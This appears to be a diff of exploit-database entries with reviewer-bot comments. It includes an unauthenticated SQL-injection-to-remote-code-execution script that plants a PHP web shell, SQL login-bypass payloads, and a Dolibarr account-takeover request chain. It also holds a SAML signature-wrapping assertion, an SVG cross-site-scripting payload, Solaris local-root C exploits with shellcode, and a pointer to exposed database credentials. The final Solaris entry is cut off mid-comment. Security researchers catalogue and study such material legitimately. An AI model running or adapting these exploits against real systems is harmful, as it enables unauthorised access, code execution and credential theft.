The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
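Review bot: the write-up gives the file location but no remediation or vendor status. It should say whether a fixed release exists and, for operators, that access to `core/config/` must be denied at the web server (vhost or `.htaccess` level) and that any credentials already exposed through `databases.yml` need to be rotated. The `# Tested on` line also omits the install path, so `http://<website>/core/config/databases.yml` may need a prefix on real deployments.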

@ -0,0 +1,25 @@
# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username = ' or sleep(5)='-- -
Password = ' '
Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
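Review bot: `# Vulnerable paramater` lists `username1 & password`, but the PoC and the quoted query use `username`; state the actual POST parameter names. Typos: `Testeted`, `paramater`. The quoted line (`index.php line 13`) builds the query by interpolating `$username` and `$password` straight into the SQL string; the write-up should note that the fix is a prepared statement with bound parameters (`mysqli_prepare` / `bind_param`), not escaping, and that passwords should not be compared in clear text in the query at all.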

exploits/php/webapps/50244.py Executable file

@ -0,0 +1,73 @@
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
import requests
import random
import string
import json
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
session = requests.session()
print("Login Bypass\n")
request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":
print("Finding first driver\n")
getHTML = session.get(url + "admin/?page=drivers")
getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
print("Found firs driver ID : " + findFirstDriverID)
print("\nFinding path")
findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
shellPath = findPath[findPath.index("admin/"):len(findPath)]
SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
print("\nShell Path : " + url+shellPath+shellname+".php")
shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
else:
print("No bypass user")
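Review bot: `# Tested on: Linux` conflicts with the path handling. The leaked path is split on backslashes (`parser = findPath.split('\\')`) and re-joined with `/`, which only makes sense for a Windows path; on a Linux path the split yields a single element, `parser.pop()` empties it, and `findPath.index("admin/")` raises ValueError. Document which platform the path discovery was actually verified on. Also `request_url = url + "/classes/Login.php?f=login"` produces a double slash because `url` has already been normalised to end with `/`, and `print("Found firs driver ID : ...")` has a typo.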

@ -0,0 +1,192 @@
# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
# Date: April 8, 2021
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.dolibarr.org/
# Affected Version: <= 14.0.1
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
*Summary:*
Using the below chain of issues attacker can compromise any dolibarr
user account including the admin.
*Poc:*
1. Visit https://example.com/api/index.php/login?login=demo&password=demo
try to login with a test user with 0 permissons or less permissions.
2. We will receive an api token in return.
3. Next we need to fetch the user id of the user whose account we want
to own.
*First we need to fetch the user id of the admin user using the below api.*
*Request1:*
GET /api/index.php/users/login/admin HTTP/1.1Host:
preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
*This will return the user details using the username. Now update the
victim user account via below api (include the json body received from the
previous request1 and replace the email id from below json to the attacker
controlled email)*
*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
deflateDOLAPIKEY: test1337Origin:
https://preview2.dolibarr.orgConnection: closeReferer:
http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
3221
{
"id": "12",
"statut": "1",
"employee": "1",
"civility_code": null,
"gender": "woman",
"birth": 495583200,
"email": "*attacker@example.com <attacker@example.com>*",
"personal_email": "",
"socialnetworks": {
"facebook": "",
"skype": "",
"twitter": "",
"linkedin": "",
"instagram": "",
"snapchat": "",
"googleplus": "",
"youtube": "",
"whatsapp": "",
"tumblr": "",
"vero": "",
"viadeo": "",
"slack": "",
"xing": "",
"meetup": "",
"pinterest": "",
"flickr": "",
"500px": "",
"giphy": "",
"gifycat": "",
"dailymotion": "",
"vimeo": "",
"periscope": "",
"twitch": "",
"discord": "",
"wikipedia": "",
"reddit": "",
"quora": "",
"tripadvisor": "",
"mastodon": "",
"diaspora": "",
"viber": ""
},
"job": "Admin Technical",
"signature": "",
"address": "",
"zip": "",
"town": "",
"state_id": null,
"state_code": null,
"state": null,
"office_phone": "",
"office_fax": "",
"user_mobile": "",
"personal_mobile": "",
"admin": "1",
"login": "admin",
"entity": "0",
"datec": 1507187386,
"datem": 1617819214,
"socid": null,
"contact_id": null,
"fk_member": null,
"fk_user": "11",
"fk_user_expense_validator": null,
"fk_user_holiday_validator": null,
"clicktodial_url": null,
"clicktodial_login": null,
"clicktodial_poste": null,
"datelastlogin": 1617816891,
"datepreviouslogin": 1617815935,
"datestartvalidity": "",
"dateendvalidity": "",
"photo": "com.jpg",
"lang": "fr_FR",
"rights": {
"user": {
"user": {},
"self": {}
}
},
"conf": {},
"users": [],
"parentof": null,
"accountancy_code": "",
"weeklyhours": "39.00000000",
"color": "",
"dateemployment": "",
"dateemploymentend": "",
"default_c_exp_tax_cat": null,
"default_range": null,
"fk_warehouse": null,
"import_key": null,
"array_options": [],
"array_languages": null,
"linkedObjectsIds": null,
"canvas": null,
"fk_project": null,
"contact": null,
"thirdparty": null,
"user": null,
"origin": null,
"origin_id": null,
"ref": "12",
"ref_ext": null,
"status": null,
"country": null,
"country_id": null,
"country_code": "",
"region_id": null,
"barcode_type": null,
"barcode_type_code": null,
"barcode_type_label": null,
"barcode_type_coder": null,
"mode_reglement_id": null,
"cond_reglement_id": null,
"demand_reason_id": null,
"transport_mode_id": null,
"cond_reglement": null,
"modelpdf": null,
"last_main_doc": null,
"fk_bank": null,
"fk_account": null,
"note_public": "",
"note_private": "",
"note": "",
"name": null,
"lastname": "Adminson",
"firstname": "Alice",
"civility_id": null,
"date_creation": null,
"date_validation": null,
"date_modification": null,
"specimen": 0,
"alreadypaid": null,
"liste_limit": 0
}
This will reset the admin email account to the attacker controlled
email account, now using the password reset feature attacker will
reset the admin account password and will gain access to the admin
account.
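Review bot: the two raw requests have lost their line structure and carry mail-client emphasis markers. In Request1 the Host line reads `preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg` (a URL pasted into the hostname) and headers run together, e.g. `Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close`; in Request2 `PUT /api/index.php/users/*12*` and `"email": "*attacker@example.com <attacker@example.com>*"` include asterisks that are not part of the request. Rewrite both one header per line without the markup so they can be replayed. `permissons` is a typo, and the roughly 140-line JSON body could be reduced to the fields the PoC actually changes (`id`, `login`, `email`), since the rest is echoed from Request1.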

@ -0,0 +1,115 @@
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036
---
The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML
Signature Wrapping Attacks that could allows an attacker to perform
privilege escalation attacks.
In order to exploit the vulnerability, the plugin must be configured
with the "Either SAML reponse or SAML assertion must be signed" options
enabled and an empty "x509 certificate".
Administrator point of view:
- Install a Drupal version (for the PoC the version 9.1.10 has been used)
- Configure an external SSO system like Auth0
- Configure the plugin with the Auth0 provider by checking the "Either
SAML response or SAML assertion must be signed" and empty "x509 certificate"
Attacker point of view:
- Register a normal user on the website
- Perform a login
- Intercept the request with Burp Suite and decode the SAMLResponse
parameter
- Inject an additional <Saml:Assertion> object before the original one
(example here:
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml)
(SAMLRaider Burp extension, XSW3 payload)
<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
<saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
<saml:AudienceRestriction>
<saml:Audience>http://localhost:8080</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
<saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
</saml:Assertion>
- Replace the username with one with higher privileges (like admin)
- Submit the request
- Successful exploitation
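Review bot: the precondition is quoted two ways, `"Either SAML reponse or SAML assertion must be signed"` and `"Either SAML response or SAML assertion must be signed"`; use the exact option label once. The header gives `# Version: 8.x-2.22 (REQUIRED)` but never states the fixed release, which the linked advisory sa-contrib-2021-036 does; add it so readers know what to upgrade to. It is also worth spelling out the defensive takeaway the two conditions imply: with an empty "x509 certificate" the plugin has no key to verify a signature against, so configuring the IdP certificate is part of the mitigation, not only the plugin update.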

@ -0,0 +1,35 @@
# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04
Steps:
1-) You need to login to the system.
http://target.com/phpwcms/login.php
2-) Creating payload with SVG extension: payload.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS!");
</script>
</svg>
3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
From the menu:
file -> multiple file upload -> Select files or drop here
4-) After uploading payload, call it from the link below.
http://192.168.1.112/phpwcms/upload/
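Review bot: the title says Arbitrary File Upload, but what the steps demonstrate is stored XSS through an uploaded SVG containing a `<script>` element; the title or an impact statement should say which is meant. Step 3 hardcodes `csrftoken=b72d02a26550b9877616c851aa6271be`, which is per-session and will not work as given. Step 4 switches from `http://target.com/phpwcms/` to `http://192.168.1.112/phpwcms/upload/` and omits the filename, so the final step is incomplete as written.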

@ -0,0 +1,356 @@
# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 Intel
/*
* raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "What we do in life echoes in eternity" -- Maximus Decimus Meridius
* https://patchfriday.com/22/
*
* Another buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
* local root. This one was discovered by Marti Guasch Jimenez, who attended my
* talk "A bug's life: story of a Solaris 0day" presented at #INFILTRATE19 on
* May 2nd, 2019 (https://github.com/0xdea/raptor_infiltrate19).
*
* It's a stack-based buffer overflow in the check_dir() function:
* void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...){
* char local_724 [300];
* ...
* __format = getenv("REQ_DIR");
* sprintf(local_724,__format,param_2);
*
* "To trigger this vulnerability we need a printer present, we can also fake
* it with the lpstat trick. We also need at least one directory in the path
* pointed by the environment variable TMP_DIR. Finally, we just need to set
* REQ_DIR with a value of 0x720 of padding + value to overwrite EBP + value to
* overwrite EIP." -- Marti Guasch Jimenez
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* Usage:
* $ gcc raptor_dtprintcheckdir_intel.c -o raptor_dtprintcheckdir_intel -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_intel 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* [...]
* # id
* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // the vulnerable program
#define BUFSIZE 2048 // size of the evil env var
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int get_sc_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE];
char platform[256], release[256], display[256];
int i, sc_addr;
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* helper program that prints argv[0] address, used by get_sc_addr() */
if (!strcmp(argv[0], "foo")) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* prepare the evil env var */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "REQ_DIR=", 8);
/* fill the envp, keeping padding */
add_env(sc);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the shellcode address */
sc_addr = get_sc_addr(VULN, argv);
/* fill with ld.so.1 address, saved eip, and arguments */
for (i = 12; i < BUFSIZE - 20; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, sc_addr); /* 2nd argument */
}
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* check for null bytes */
check_zero(sc_addr, "sc address");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* get_sc_addr(): get shellcode address using a helper program
*/
int get_sc_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11] = "\x00";
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = 0x0;
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) < 0) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check and return address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read sc address from helper program\n");
exit(1);
}
return addr;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address null bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}
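Review bot: `search_rwx_mem()` has two logic issues. The comment promises an RWX segment, but `map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)` is non-zero for any mapping with at least one of the three flags, so the selection depends on mapping order rather than permissions; testing `== (MA_READ | MA_WRITE | MA_EXEC)` would match the comment. And `int addr = 0, addr_old;` followed by `return addr_old;` reads `addr_old` uninitialised when nothing matched, instead of failing explicitly as `check_zero()` does. Smaller points: `memset`, `memcpy` and `strlen` are declared in `<string.h>` (only the BSD `bcopy` family is guaranteed by `<strings.h>`), and `char tmp[16]` for `sprintf(tmp, "/proc/%d/map", ...)` holds a five-digit pid with no spare byte.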

@ -0,0 +1,279 @@
# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 Intel
/*
* raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "I'm gonna have to go into hardcore hacking mode!" -- Hackerman
* https://youtu.be/KEkrWRHCDQU
*
* Same code snippet, different vulnerability. 20 years later, format string
* bugs are not extinct after all! The vulnerable function looks like this:
*
* void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...)
* {
* ...
* char local_724 [300];
* ...
* else {
* __format = getenv("REQ_DIR");
* sprintf(local_724,__format,param_2); // [1]
* }
* ...
* local_c = strlen(local_724); // [2]
* sprintf(local_5f8,"/var/spool/lp/tmp/%s/",param_2); // [3]
* ...
* }
*
* The plan (inspired by an old technique devised by gera) is to exploit the
* sprintf at [1], where we control the format string, to replace the strlen
* at [2] with a strdup and the sprintf at [3] with a call to the shellcode
* dynamically allocated in the heap by strdup and pointed to by the local_c
* variable at [2]. In practice, to pull this off the structure of the evil
* environment variable REQ_DIR must be:
* [sc] [pad] [.got/strlen] [.got/sprintf] [stackpop] [W .plt/strdup] [W call *-0x8(%ebp)]
*
* To collect the needed addresses for your system, use:
* $ objdump -R /usr/dt/bin/dtprintinfo | grep strlen # .got
* 080994cc R_386_JUMP_SLOT strlen
* $ objdump -R /usr/dt/bin/dtprintinfo | grep sprintf # .got
* 080994e4 R_386_JUMP_SLOT sprintf
* $ objdump -x /usr/dt/bin/dtprintinfo | grep strdup # .plt
* 0805df20 F *UND* 00000000 strdup
* $ objdump -d /usr/dt/bin/dtprintinfo | grep call | grep ebp | grep -- -0x8 # .text
* 08067f52: ff 55 f8 call *-0x8(%ebp)
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_sparc.c (just a proof of concept)
* raptor_dtprintcheckdir_sparc2.c (the real deal)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_intel2.c -o raptor_dtprintcheckdir_intel2 -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_intel2 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* [...]
* # id
